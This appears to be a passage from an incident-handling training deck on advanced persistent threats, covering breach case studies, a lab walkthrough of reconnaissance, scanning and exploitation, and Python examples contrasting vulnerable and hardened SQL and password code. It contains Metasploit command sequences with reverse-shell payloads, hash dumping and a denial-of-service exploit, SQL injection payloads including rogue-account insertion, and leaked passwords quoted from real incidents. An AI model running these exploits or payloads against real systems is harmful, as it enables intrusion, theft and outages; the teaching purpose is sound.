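    print("hardened handler:", safe_checkout(TAMPERED_FORM))
    print("hardened handler:", safe_checkout(HONEST_FORM))
```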
Parameter Tampering
• With a proxy such as Paros Proxy we can modify the request

SQL Injection
• SQL injection is a particularly widespread and dangerous form of injection
– To exploit a SQL injection flaw, the attacker must find a parameter that the web application passes through to a database
– By carefully embedding malicious SQL commands into the content of the parameter, the attacker can trick the web application into forwarding a malicious query to the database

SQL Injection
• SQL Injection happens when a developer accepts user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters.
• This can allow an attacker to not only steal data from your database, but also modify and delete it.

SQL Injection
• Certain SQL servers such as Microsoft SQL Server contain Stored and Extended Procedures (database server functions).
• If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.

SQL Injection
• Attackers commonly insert single quotes into a URL's query string, or into a form's input field, to test for SQL Injection.
• If an attacker receives an error message like the one below there is a good chance that the application is vulnerable to SQL Injection.
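To make the single-quote test concrete from the defender's side, here is an added example (not from the slides) with an in-memory sqlite3 table standing in for the CMS database: a query built by string formatting answers a stray quote with a database error, while a parameterised query, with the slides' known-good input check in front of it, does not. The table, rows and function names are constructed.

```python
"""SQL injection: string-built query versus a parameterised, validated query.

Added example, not from the original slides. The schema, rows and function
names are constructed; sqlite3 stands in for the CMS database.
"""
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table shaped like the CMS pages the slides discuss."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)", [
        (2, "About", "public text"),
        (27, "Services", "public text"),
    ])
    return conn


def get_page_vulnerable(conn, page: str):
    """Slide pattern: user input dropped straight into the statement. A stray
    quote changes the SQL grammar, so the database raises a syntax error; that
    error text, if echoed to the browser, is the signal the slides describe."""
    sql = f"SELECT id, title FROM pages WHERE id = '{page}'"
    return conn.execute(sql).fetchall()


def get_page_parameterised(conn, page: str):
    """Hardened: the value travels as a bound parameter, never as SQL text, so a
    quote is just a character inside the compared value."""
    return conn.execute("SELECT id, title FROM pages WHERE id = ?", (page,)).fetchall()


NUMERIC_ID = re.compile(r"^[0-9]{1,9}$")   # allow-list: a page id is 1-9 digits


def get_page_validated(conn, page: str):
    """The slides' advice applied: accept only known-good input. Anything that
    is not a plain numeric id is rejected before it reaches the database, and
    the query is still parameterised underneath."""
    if not NUMERIC_ID.match(page):
        raise ValueError(f"rejected page id {page!r}")
    return conn.execute("SELECT id, title FROM pages WHERE id = ?", (int(page),)).fetchall()


def probe_outcomes(page: str) -> dict:
    """Run one input through all three handlers and report what the client would see."""
    conn = make_db()
    out = {}
    try:
        out["vulnerable"] = get_page_vulnerable(conn, page)
    except sqlite3.Error as e:
        out["vulnerable"] = f"DB ERROR: {e}"      # error message leaks to the client
    out["parameterised"] = get_page_parameterised(conn, page)
    try:
        out["validated"] = get_page_validated(conn, page)
    except ValueError as e:
        out["validated"] = f"REJECTED: {e}"
    return out


if __name__ == "__main__":
    for probe in ("27", "27'"):
        print(repr(probe), "->", probe_outcomes(probe))
```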
SQL Injection Example

APT IN DEPTH: DECONSTRUCTING THE ATTACK

Some Examples
• Aurora
• Stuxnet
• HB Gary
• Sony PlayStation Network
• Night Dragon
• RSA
• Oakridge

Operation Aurora

Operation Aurora (January 2011)
• Attack started in December, 2010 until beginning of January, 2011
• Sourced from servers in Taiwan, Texas and Illinois
• Intellectual property was what they were trying to steal
• Demonstrated several of the key components of an APT
• Speculations are a Chinese state-sponsored attack
• IP addresses that were used had been used in the past against US companies and were confirmed to be Chinese state-sponsored (i.e. PLO) – fits the profile
• Google and at least 30 other companies (incl. Yahoo, Symantec, Juniper, Northrop Grumman and Dow Chemicals) were hit

Operation Aurora (January 2011)
• Gipson, Hoffman & Pancione (LA law firm)
• Also hit with spear phishing e-mails from people staff recognized, with a link/attachment
• Attack reported to the FBI
• They represented a US company over a legal dispute regarding a copyright infringement over China's Green Dam software
• Attack fit the profile of the Google attack

Operation Aurora (January 2011)
• Attackers targeted software-configuration management (SCM) systems that held proprietary information of Google, Adobe and other Fortune 100 companies over several months.
• Zero-day IE vulnerability
• Was based on a vulnerability in IE known to Microsoft, but not seen actively in the "wild".
• Affects: Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4, and Internet Explorer 6, Internet Explorer 7 and Internet Explorer 8 on supported editions of Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.

Operation Aurora (January 2011)
• To gain initial access to the victim's networks, the attackers started with targeted spear phishing attacks against the victim company
• The email appeared to be from someone trusted.
• Contained a link to a Taiwanese website that hosted malicious JavaScript.
• The malware, in turn, exploited an IE vulnerability
• The exploit triggers when Internet Explorer attempts to access memory that has been partially freed.

Operation Aurora
• Once exploited, the victim machines connected to a number of C&C systems over TCP/443 – think covert channel
– Difficult to inspect (encrypted)
– Not out of the ordinary

Operation Aurora
• The attacker then used the owned machines to attack other systems on the same network (pivoting).
• In "Operation Aurora", software configuration mgmt (SCM) systems were targeted due to their commonly insecure nature.
• We will see this attack during the demonstration section

Stuxnet

Stuxnet
• Very complex SCADA attack
• Stuxnet demonstrated that even isolated physical networks could be hacked.
• Discovered by the VirusBlokAda company in Minsk, Belarus in July, 2010
• Affecting >15 plants in Iran, Indonesia, India, UK, North America, Korea

Stuxnet
• Targets Siemens WinCC and SIMATIC Process Control System (PCS7)
• Programmable logic controller (PLC) rootkit
• Symantec noted that 60% of worldwide targeted machines were in Iran
• Put their nuclear enrichment program back as much as 5 yrs!
• Many different ideas of who was responsible
– Some say the US or its allies (i.e. Israel)

Stuxnet
• Attacked Windows systems
• Stuxnet had 5 zero-day vulnerabilities – one or two is common, 5 is not
• And used Conficker (MS08-067) to spread
• Used many vulnerabilities previously patched in Windows (i.e. MS10-046 LNK Vulnerability)
• Used the Shortcut icon vulnerability (MS10-046) – affecting every version of Windows since Windows 2000 (even Win 95) (patched Aug 2, 2010)
– Allows for execution without even opening a file

Stuxnet
• Written in different languages (i.e. C, C++)
• Used 7 methods of spreading itself
• Spread mostly through USB thumb drives
• Network shares, print spoolers & Siemens project files
• UPX packed, XOR encoded everywhere
• Connected to C&C and sent off some sensitive data, but mostly controlled the PLCs in-field

Stuxnet
• MS10-046 (LNK Vulnerability) – almost two years old
• MS08-067 (Server Service) – patched for two years
• MS10-061 (Print Spooler) – disclosed over one year ago
– Used to push a file to a remote machine and have it execute
• MOF 'Feature' – not a vulnerability?
• WinCC DBMS Password – original work
• Step7 Project Files – original work
• MS10-073 (Kbd Privilege Escalation) – original work
• Rootkit drivers signed with valid certificates (Realtek and JMicron)

Stuxnet – Natanz Nuclear Facility
• Caused the Iranian IR-1 centrifuge to increase from its normal operating speed of 1,064 hertz to 1,410 hertz for 15 minutes before returning to its normal frequency
• Twenty-seven days later, the virus went back into action, slowing the infected centrifuges down to a few hundred hertz for a full 50 minutes.
• The stresses from the excessive, then slower, speeds caused the aluminum centrifugal tubes to expand, often forcing parts of the centrifuges into sufficient contact with each other to destroy the machine.

Stuxnet
• Would record normal readings of the centrifuge and replay these readings to technicians
• Stuxnet would affect the performance of the equipment and provide false information to technicians
• The other thing Stuxnet would do: if the technicians noticed (maybe based on sound) that the centrifuge was spinning out of control, they would go for the kill switch – Stuxnet knew how to disable that!

Future Effects of Stuxnet-like Threats
• Infrastructure-based malware, APT
– Water supplies
– Power grids
– Nuclear power plants
– Air traffic control
– Military

RSA

RSA
• We assumed the hack on RSA was just that, a hack to get into RSA.
• But this is another indication of APT
• The Lockheed hack may have been planned for quite a while – hacking RSA was part of this plan.
• Like the thief that breaks into an engineering company to steal the plans to a bank's building layout.
• Wouldn't surprise me if we don't see increased attempts against other sub-contractors

RSA
• Provides SecurID to White House, CIA, NSA, Pentagon, DHS, Lockheed, Grumman, L3, etc.
• Targeted e-mail sent to EMC employees on March 3, 2011
• Contained an attachment called "2011 Recruitment plan.xls".

RSA
• Opening the XLS attachment
• Embedded Flash object shows up as a [X] symbol in the spreadsheet

RSA
• The Flash object is executed by Excel
• The Flash object then uses a Flash Player vulnerability (CVE-2011-0609) to execute code and to drop a Poison Ivy backdoor (or PI-RAT) onto the system.
• Poison Ivy is a form of "Remote Access Toolkit" or RAT.
• The exploit code then closes Excel and the infection is over.
• After this, Poison Ivy connects back to its server at good.mincesur.com.

RSA
• The domain mincesur.com has been used in similar espionage attacks over an extended period of time.
• Once the connection is made, the attacker has full remote access to the infected workstation.
• Even worse, it has full access to network drives that the user can access.
• Apparently the attackers were able to leverage this vector further until they gained access to the critical SecurID data they were looking for.

RSA
• To further obscure the removal of massive amounts of data, the aggregated data was placed in several compressed and password protected RAR files.
• RAR is a compressed archive format for files.
• They used FTP to transfer the RAR files to an outside staging server (a compromised machine at a hosting provider).
• Finally, the attackers pulled the files from the external compromised host.
Oakridge Labs

"One of our core competencies at the lab is cyber security research" (Thomas Zacharia – Deputy Director, Oak Ridge National Laboratory)

ORNL
• Deliver scientific discoveries and technical breakthroughs for clean energy – home of the 1943 "Manhattan Project"
• Spear-phishing campaign starting on April 7, 2011
• Directed at Oak Ridge's business systems
• The attacks were launched through phishing emails that were sent to some 573 of 5000 lab employees.
• The emails were disguised to appear like they came from the lab's HR department – regarding benefits related changes.

ORNL
• 57 out of some 530 employees clicked on a link in the email 'campaign', according to Thomas Zacharia, ORNL deputy lab director
• The emails contained a link that employees were asked to click on for further information.
• The malware exploited a zero-day flaw in Internet Explorer, and compromised two of the 57 systems
• Allows an attacker to install malware on a user's machine if he or she visits a malicious web site.
• Flaw was patched by Microsoft on April 12 (days after the first e-mail was received – server breach discovered on April 11).

ORNL
• One of those two computers then spread the malware to other systems within the lab.
• Some employees appear to have clicked on the link, resulting in an information-stealing malware program being downloaded on their systems
• Had to shut down E-mail and Internet connection
• Interestingly enough, ORNL is a center of excellence for cyber security for the DOE and conducts research into malware and vulnerabilities in software and hardware as well as phishing attacks.
Sony PlayStation Network

Sony PlayStation Network
• Hacked by the group Anonymous in Apr 2011
• Called OpSony
• Reported that a file named "Anonymous" was planted on PlayStation servers and it reportedly contains the words "We are Legion."
• Exposed the names, birthdays, email addresses, passwords, security questions, credit card details of all PSN users.

Sony PlayStation Network
• Actual attack vector will probably remain unknown
• All the data was unencrypted!
• Theory by security experts is an exploit as simple as basic SQL Injection/Parameter tampering.
• Anonymous has performed similar attacks on other Sony real estate:
• http://www.sonymusic.co.jp/bv/cromagnons/track.php?item=7419

Sony PlayStation
• Hacking of 77 million Sony users' data, which caused a 23-day closure, is expected to cost the company $171M
• Sony said the effects to the company of the March earthquake that struck Japan will be about $268.9 million.
• The company said its loss for the fiscal year that ended on March 31 will be about $3.18 billion

HB Gary

"We were terrified. I saw all the fruits of my labor, my livelihood, being jeopardized." (Greg Hoglund – HB Gary)

HBGary Federal – SQL Injection
• Dismantled and humiliated by "Anonymous" using a SQL Injection attack in a nearly meaningless web application as its start point
• Used the hack against HBG's CMS system
• Rather than using an off-the-shelf CMS, HBG had a custom app built
• Advantage of off-the-shelf – thousands of users and regular bug fixes, resulting in a much lesser chance of extant security flaws.
HBGary Federal
• The exact URL used to break into hbgaryfederal.com was http://www.hbgaryfederal.com/pages.php?pageNav=2&page=27
• The URL has two parameters named pageNav and page, set to the values 2 and 27, respectively.
• One or other or both of these was handled incorrectly by the CMS, allowing the hackers to retrieve data from the database that they shouldn't have been able to get.

HBGary Federal – SQL Injection
• Specifically, the attackers grabbed the user database from the CMS: the list of usernames, e-mail addresses, and password hashes for the HBGary employees authorized to make changes to the CMS.
• It stored only hashed passwords: passwords that have been mathematically processed with a hash function to yield a number from which the original password can't be deciphered (i.e. 897&%$$%)
• Rainbow tables were used to brute force the hashes
• CEO Aaron Barr and COO Ted Vera used passwords that were very simple; each was just six lower case letters and two numbers

HB Gary – Password Reuse?
• This should have only affected HB Gary Federal
• Unfortunately for HBGary Federal, it was not.
• Neither Aaron nor Ted followed best practices.
• Instead, they used the same password in a whole bunch of different places, including email, Twitter accounts, and LinkedIn.
• For both men, the passwords allowed retrieval of e-mail

HB Gary…SSH without certs…bad.
• Along with its web server, HBGary had a Linux machine, support.hbgary.com, on which many HBGary employees had shell accounts with ssh access, each with a password used to authenticate the user.
• One of these employees was Ted Vera, and his ssh password was identical to the cracked password he used in the CMS.
• This gave the hackers immediate access to the support machine.
• HB Gary could have used certificate based authentication, but instead opted for passwords only.

HB Gary
• Ted was only a regular non-superuser – meaning he could only see data owned by his account.
• Unfortunately, the server was vulnerable to privilege escalation – essentially allowing a normal user to become "root".
• The error was published in October 2010 with a full, working exploit.
• By November, most distributions had patches available, and there was no good reason to be running the exploitable code in February 2011.

HB Gary
• Exploitation of this flaw gave the Anonymous attackers full access to HB Gary's system
• It was then that they discovered many gigabytes of backups and research data, which they duly purged from the system

HB Gary
• Aaron's password yielded even more fruit. HBGary used Google Apps for its e-mail services
• For both Aaron and Ted, the password cracking provided access to their mail.
• But Aaron was no mere user of Google Apps: his account was also the administrator of the company's mail.
• With this higher access, he could reset the passwords of any mailbox and hence gain access to all the company's mail, not just his own. It's this capability that yielded access to Greg Hoglund's mail.

HB Gary
• And what was done with Greg's mail? A little bit of social engineering, that's what.
• Contained within Greg's mail were two bits of useful information.
– The root password to the machine running Greg's rootkit.com site was either "88j4bb3rw0cky88" or "88Scr3am3r88".
– Jussi Jaakonaho, "Chief Security Specialist" at Nokia, had root access.
– Vandalizing the website stored on the machine was now within reach.
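The CMS-hash and password-reuse slides above turn on one property: an unsalted hash gives the same output for the same password everywhere, which is what lets a precomputed (rainbow) table answer for every user at once. This added example (not from the slides or HBGary's code) contrasts that with a salted, iterated hash and a constant-time verify; the user names, passwords and the tiny lookup table are constructed.

```python
"""Unsalted hashes versus salted, slow hashes: why a precomputed table worked on the CMS.

Added example, not from the original slides or HBGary's code. Users, passwords
and the miniature lookup table below are constructed for illustration.
"""
import hashlib
import hmac
import os


def legacy_hash(password: str) -> str:
    """Unsalted MD5, the pattern the slides describe: same password, same hash,
    so one precomputed table answers for every user and every site."""
    return hashlib.md5(password.encode()).hexdigest()


def build_lookup_table(candidates) -> dict:
    """A (very small) precomputed table: hash -> password. A real rainbow table
    covers a whole keyspace such as 'six lower-case letters plus two digits';
    here we enumerate only a constructed handful to show the mechanism."""
    return {legacy_hash(p): p for p in candidates}


def hash_password(password: str, salt: bytes = b"", iterations: int = 100_000) -> str:
    """Salted PBKDF2-HMAC-SHA256. The random per-user salt defeats precomputation
    (every user would need their own table) and the iteration count makes each
    guess cost ~100k hash operations instead of one. Format: algo$iters$salt$dk."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt/iterations and compare in constant time."""
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


# Constructed user records: two users who happened to pick the same weak password.
USERS = {"aaron": "qwerty12", "ted": "qwerty12", "greg": "correct-horse-battery-staple"}


def demo() -> dict:
    """Legacy hashes collide across users and are found in the table; salted
    hashes differ per user and cannot be looked up, yet still verify."""
    legacy = {u: legacy_hash(p) for u, p in USERS.items()}
    table = build_lookup_table(["password", "qwerty12", "letmein1", "hbgary11"])
    recovered = {u: table.get(h) for u, h in legacy.items()}   # None = not in table
    salted = {u: hash_password(p) for u, p in USERS.items()}
    return {
        "legacy_collide": legacy["aaron"] == legacy["ted"],
        "recovered_legacy": recovered,
        "salted_collide": salted["aaron"] == salted["ted"],
        "salted_verify": verify_password("qwerty12", salted["aaron"]),
        "salted_reject": verify_password("qwerty13", salted["aaron"]),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```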
HB Gary
• The attackers just needed a little bit more information:
– They needed a regular, non-root user account to log in with, because as a standard security procedure, direct ssh access with the root account is disabled.
– Armed with the two pieces of knowledge above, and with Greg's e-mail account in their control, the social engineers set about their task.

HB Gary
• The e-mail correspondence tells the whole story:
– From: Greg
To: Jussi
Subject: need to ssh into rootkit
im in europe and need to ssh into the server. can you drop open up firewall and allow ssh through port 59022 or something vague? and is our root password still 88j4bb3rw0cky88 or did we change to 88Scr3am3r88 ? thanks

HB Gary
• From: Jussi
To: Greg
Subject: Re: need to ssh into rootkit
hi, do you have public ip? or should i just drop fw? and it is w0cky - tho no remote root access allowed
• From: Greg
To: Jussi
Subject: Re: need to ssh into rootkit
no i dont have the public ip with me at the moment because im ready for a small meeting and im in a rush. if anything just reset my password to changeme123 and give me public ip and ill ssh in and reset my pw.

HB Gary
• From: Jussi
To: Greg
Subject: Re: need to ssh into rootkit
ok, it should now accept from anywhere to 47152 as ssh. i am doing testing so that it works for sure. your password is changeme123 i am online so just shoot me if you need something. in europe, but not in finland? _jussi
• From: Greg
To: Jussi
Subject: Re: need to ssh into rootkit
if i can squeeze out time maybe we can catch up.. ill be in germany for a little bit. anyway I can't ssh into rootkit. you sure the ips still 65.74.181.141? thanks

HB Gary
• From: Jussi
To: Greg
Subject: Re: need to ssh into rootkit
does it work now?
• From: Greg
To: Jussi
Subject: Re: need to ssh into rootkit
yes jussi thanks did you reset the user greg or?
• From: Jussi
To: Greg
Subject: Re: need to ssh into rootkit
nope. your account is named as hoglund
• From: Greg
To: Jussi
Subject: Re: need to ssh into rootkit
yup im logged in thanks ill email you in a few, im backed up

HB Gary
• To be fair to Jussi, the fake Greg appeared to know the root password and, well, the e-mails were coming from Greg's own e-mail address.
• But over the course of a few e-mails it was clear that "Greg" had forgotten both his username and his password.
• And Jussi handed them to him on a platter

Night Dragon

Night Dragon (Jan-Feb 2011)
• Night Dragon is a coordinated, covert and targeted cyberattack
• Conducted against global oil, energy, and petrochemical companies.
– Exxon Mobil, Royal Dutch Shell, BP, Marathon Oil, ConocoPhillips and Baker Hughes
• The attack has involved:
– Social engineering,
– Spear-phishing attacks,
– Exploitation of Microsoft Windows OS vulnerabilities,
– Microsoft Active Directory compromises,
– The use of remote administration tools (RATs)
• The objective is harvesting sensitive competitive proprietary operations and project-financing information

Night Dragon

Night Dragon
• The Night Dragon attacks work by methodical and progressive intrusions into the targeted infrastructure.
• Several basic activities are performed by the Night Dragon operation:
– Deploy privately developed and customized RAT tools, by first compromising perimeter security controls, through SQL-injection exploits of extranet web servers, as well as targeted spear-phishing attacks of mobile worker laptops,

APT in Depth: DEMONSTRATIONS

Objectives
• To tie everything together we have learned
• Show some of the steps an attacker uses to compromise systems
• To get into the mindset of an attacker so that, as an incident handler, you can anticipate their moves
• To gain hands-on experience with various attack tools
• To understand how the defenses work and why they are important

So how do hackers do it?
• They have a process (with steps) of their own!
– Step 1 – Reconnaissance "Recon"
– Step 2 – Scanning
– Step 3 – Exploit Systems
  • Gaining Access
  • Elevating Access
  • App-level Attacks
  • Denial of Service
– Step 4 – Keeping Access
– Step 5 – Covering the Tracks

Step 1 - Recon
• Open source investigation to gain information about a target

Step 2 - Scanning
• Attacker uses a variety of mechanisms to survey a target to find holes in the target's defenses.

Step 3 - Exploiting
• The attacker tries to gain access, undermine an application or deny access to other users.

Step 4 – Keeping Access
• Attacker maintains access by manipulating the software installed on the system to achieve backdoor access.

Step 5 – Covering the Tracks
• The attackers maintain their hard-fought access by covering their tracks.
• They hide from users and systems administrators using a variety of techniques

STEP 1 - Recon

Recon
• Reconnaissance is "casing the joint"
• Two general types of attackers:
– What we used to call "script kiddies" – look for low-hanging fruit, and may skip this step
– Attackers out to get a particular site – this step is extremely important
• To begin an attack, your adversary will gather as much information as possible from open sources.
• Before bandits rob a bank, they will visit the branch, look at the times the guards enter and leave, and observe the location of cameras.

Recon
• Domain Information Leakage (aka whois)
• DNS Interrogation
• Web site searches
• Using Google as a Recon tool
• Sam Spade
• Web-based recon and attack tools
• Think Advanced Persistent Threat!

STEP 2 - Scanning

Scanning
• After completing a thorough reconnaissance of the target, attackers begin scans to find openings in the target system

Scanning the Perimeter
• Scanning is normally one of the initial activities an attacker may conduct to identify any vulnerable hosts that can be exploited
• We see numerous "port scanning" events

What does this look like…

Running NMAP
• Simple ARP Ping Scan
– nmap -v -sn 192.168.67.0/24 (ARP Ping Scan)
• Run a port scan
– nmap -sV 192.168.67.0/24
– In our case (to save time)
– nmap -sV 192.168.67.10-11

Nmap Demonstration

What Did nmap tell us?
• 192.168.67.10
– Probably Windows box
– Web server
– DNS
– Lots of SMB stuff (AD maybe?)
• 192.168.67.11
– Probably Windows box
– RPC stuff
– uPNP
• 192.168.67.12
– Attacker machine
• 192.168.67.13
– ftp (vsftpd)
– SSH – OpenSSH
– HTTP – Apache
– Samba
– NFS
– MySQL
– Probable UNIX

O/S Fingerprinting

O/S Fingerprinting
• OS Fingerprinting is a method of detecting the remote host's operating system using information leaked by that host's TCP stack. To do this, we use:
– the responses it gives to carefully crafted packets (active mode)
– or observation of captured network traffic (passive mode).
• These methods are possible because each OS implements its TCP stack differently.
• OS Fingerprinting (ab)uses these differences.

Use of nmap for O/S Fingerprinting
• nmap -O 192.168.67.10 192.168.67.11 192.168.67.13
– 192.168.67.10 Windows XP (maybe)
– 192.168.67.11 Windows XP
– 192.168.67.13 Linux

Nmap Demonstration

Vulnerability Scanners

Vulnerability Scanners
• Tools to help map a network, scan for open ports, and find various vulnerabilities
• Test against a list of known exploits
– What about the unknown?
– That's why we want to have security in-depth!
• Generate pretty reports
– Information overload
– What do you do with a 2,000 page report?
• Difference between vulnerability scanning and exploitation?
– A vulnerability scan only tests theoretically that a system is vulnerable; the system is not normally exploited

Vulnerability Scanners
• Vulnerability database - It contains a list of vulnerabilities for a variety of systems and describes how those vulnerabilities should be checked.
• User configuration tool - By interacting with this component of the vulnerability scanner, the user selects the target systems and identifies which vulnerability checks to run.
• Scanning engine - Based on the vulnerability database and user configuration, this tool formulates packets and sends them to the target to determine whether vulnerabilities are present.
• Knowledge base of current active scan – Keeps track of the current scan, remembering the discovered vulnerabilities, and feeding data to the scanning engine.
• Results repository and report generation tool - Generates reports for its user, explaining which vulnerabilities were discovered on which targets and possibly recommending remedial actions for dealing with the discovered flaws.

A bunch of vulnerability scanners

Vulnerability Scanner - Nessus

Nessus
• Free (kind of), open-source general vulnerability scanner maintained by Tenable Network Security
– Software is free
– Signatures are either free (home feed) or $$$ (professional feed)
– Difference is how often you get updates
• As such it is used by the white hat community as well as the black hat community
• Project started by Renaud Deraison
• Available at www.nessus.org
• Consists of a client and server, with modular plug-ins for individual tests
• Now the client is web-based

Nessus - Architecture
• Client-server architecture
• Both can run on the same machine
• Tenable now will outsource the server component as an ASP
• Information sent between the two is encrypted

Nessus - Platform
• Server
– Windows (XP, 2003, Vista, 2008, 7)
– Mac OS X
– Linux (Debian, Fedora, Red Hat, SUSE, Ubuntu)
– FreeBSD
– Solaris 10
• Client
– Pretty much anything with a browser (including the iPhone)

Nessus Plugins
• There is a defined API for writing Nessus plugins
– Some plugins written in C
– Plugins can be written in the Nessus Attack Scripting Language (NASL)
– One plugin is in charge of doing one attack and reporting the rest to the Nessus server
– Each plugin can use some functions of the Nessus library, called libnessus, and store information in a shared knowledge base.

Example Nessus Output

Running Nessus
• https://192.168.67.12:8834
• Let's create a scan policy

Nessus Demonstration

Running Nessus
• 192.168.67.10
– Arbitrary code can be executed on the remote host due to a flaw in the 'Server' service.
– The remote host is vulnerable to a buffer overrun in the 'Server' service that may allow an attacker to execute arbitrary code on the remote host with 'System' privileges.
• 192.168.67.10
– Arbitrary code can be executed on the remote host through the WINS service
– The remote host has a Windows WINS server installed. The remote version of this server has two vulnerabilities that may allow an attacker to execute arbitrary code on the remote system

Running Nessus
• 192.168.67.10
– Arbitrary code can be executed on the remote host.
– The remote host is running a version of Windows that has a flaw in its RPC interface, which may allow an attacker to execute arbitrary code and gain SYSTEM privileges.
• 192.168.67.10
– The remote Windows host has an ASN.1 library that could allow an attacker to execute arbitrary code on this host.
– To exploit this flaw, an attacker would need to send a specially crafted ASN.1 encoded packet with improperly advertised lengths.
Running Nessus
• 192.168.67.11
– Arbitrary code can be executed on the remote host due to a flaw in the 'Server' service
– The remote host is vulnerable to a buffer overrun in the 'Server' service that may allow an attacker to execute arbitrary code on the remote host with 'System' privileges.
– Exploitable With: Canvas (CANVAS), Core Impact, Metasploit (Microsoft Server Service Relative Path Stack Corruption)

Running Nessus
• 192.168.67.13
– The remote FTP server is vulnerable to an FTP server bounce attack.
– It is possible to force the remote FTP server to connect to third parties using the PORT command.
• 192.168.67.13
– An administrative account on the remote host uses a weak password.
– The account 'root' has the password 'password'. An attacker may use it to gain further privileges on this system

STEP 3 - Exploiting

Exploiting
• Using the information we discovered regarding ports and services, research known vulnerabilities
• Similarly, use the results from Nessus to determine the exploit for a given vulnerability

MetaSploit
• MS KB numbers (i.e. MS08-067) translate to MetaSploit exploit modules
• http://www.metasploit.net/modules
• Search by:
– (OSVDB) Open Source Vulnerability Database ID
– BugTraq ID
– Full Text Search
– (CVE) Common Vulnerabilities and Exposures ID
– Microsoft Security Bulletin ID

MetaSploit – Example #1
• MS08-067: Vulnerability in Server service could allow remote code execution
– Defect in Netapi32.dll
• MS08-067 on 192.168.67.11
– msf > use exploit/windows/smb/ms08_067_netapi
– msf > show payloads
– msf > set PAYLOAD windows/meterpreter/reverse_tcp
– msf > set LHOST [My_IP_Address]
– msf > set RHOST [Victim_IP_Address]
– msf > exploit

MetaSploit – Example #1
• Now that we have executed an exploit
– Let's own the box
– meterpreter > sysinfo
– meterpreter > getsystem (Elevate privilege)
– meterpreter > getprivs
– meterpreter > shell (grab a shell)
– meterpreter > hashdump (dump the local SAM)
• Ophcrack anyone?

Metasploit Demonstration

Keeping Access?
• Rootkit?
• Backdoor?
• Backup account?
• RDP?

How about a bit of DoS?
• 192.168.67.10 – Our Windows 2003 Domain Controller
• MS04-007 – Microsoft ASN.1 Library Bitstring Heap Overflow
– This is an exploit for a previously undisclosed vulnerability in the bit string decoding code in the Microsoft ASN.1 library.
– You are only allowed one attempt with this vulnerability. If the payload fails to execute, the LSASS system service will crash and the target system will automatically reboot itself in 60 seconds. If the payload succeeds, the system will no longer be able to process authentication requests, denying all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system.

How about a bit of DoS?
• msf > use exploit/windows/smb/ms04_007_killbill
• msf exploit(ms04_007_killbill) > show payloads
• msf exploit(ms04_007_killbill) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms04_007_killbill) > set LHOST [MY IP ADDRESS]
• msf exploit(ms04_007_killbill) > set RHOST [TARGET IP]
• msf exploit(ms04_007_killbill) > exploit

Metasploit Demonstration

Web Applications

SQL Injection - Review
• SQL injection is a particularly widespread and dangerous form of injection
– To exploit a SQL injection flaw, the attacker must find a parameter that the web application passes through to a database
– By carefully embedding malicious SQL commands into the content of the parameter, the attacker can trick the web application into forwarding a malicious query to the database

Hacme Bank
• Windows 2003 Server (patched)
• Microsoft IIS web server
• Microsoft SQL Server 2005
• .NET Framework

Hacme Bank
• Online banking application
• Offers a bunch of features
– Transfer funds - The application allows users of the application to transfer funds from one account to another.
– Request a loan - The users will be able to request a loan from the application to any of their internal accounts.
The interest rates are preset and vary with the period of the loan requested
– View transactions
– Manage your bank accounts
– Change password
– Post messages

Hacme Bank
• Offers a bunch of features
– Admin interface
  • Manage all accounts
  • Manage messages
  • Manage users
  • Unrestricted SQL queries

Let's Test the App…
• Username: jv Password: jv789
• Username: jm Password: jm789
• Username: jc Password: jc789

SQL Demonstration

Demo #1
• ' OR 1=1--
• Well known hack…
• In the username or password field
• Standard login may look like this:
– SELECT Count(*) FROM Users WHERE UserName='Paul' AND Password='password'
• Ours comes out:
– SELECT Count(*) FROM Users WHERE UserName='' OR 1=1
• Let's try it…

Demo #1
• The expression 1=1 is always true for every row in the table, and a true expression OR'd with another expression will always return true.
• So, assuming there's at least one row in the Users table, this SQL will always return a nonzero count of records.

Demo #2
• ' HAVING 1=1--
• What does the error give us?
• Using the error information above, the attacker can determine that the name of the table storing login information is FSB_USERS and that it has a column named USER_ID.

Demo #2
• ' UNION SELECT * FROM FSB_USERS WHERE user_id = 'JV' GROUP BY user_id;--
• What does the error give us?
• This process is known as database enumeration.
• Armed with this information, the attacker now attempts to determine the data type of each column.

Demo #2
• '; INSERT INTO FSB_USERS (USER_NAME, LOGIN_ID, PASSWORD, CREATION_DATE) VALUES('HAX0R12', 'HACKME12', 'EASY32', GETDATE());--
• Any thoughts on what this will do?
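The Demo #1 login as an added example (not code from the slides or from Hacme Bank): the query written the vulnerable way, with user input concatenated into the SQL text as the slide shows, beside its parameterized form, both run against an in-memory SQLite table so the same ' OR 1=1-- input can be replayed offline. The Users table layout mirrors the slide's SELECT, the rows are the three test accounts from the "Let's Test the App" slide, and the plaintext Password column exists only to match that query.

```python
"""Added example (not from the slides): the Hacme Bank login from Demo #1,
written once with string concatenation and once parameterized, run against
an in-memory SQLite table so the ' OR 1=1-- input can be replayed safely.
Table/column names mirror the slide's query; the rows are constructed."""
import sqlite3

SEED_USERS = [("jv", "jv789"), ("jm", "jm789"), ("jc", "jc789")]  # test accounts from the slide


def make_db():
    """In-memory Users table shaped like the slide's SELECT Count(*) query."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserName TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)", SEED_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """The slide's pattern: user input concatenated straight into the SQL text.
    The assembled text is what the database parses, so ' OR 1=1-- rewrites
    the WHERE clause and comments out the password check."""
    sql = ("SELECT Count(*) FROM Users WHERE UserName='" + username +
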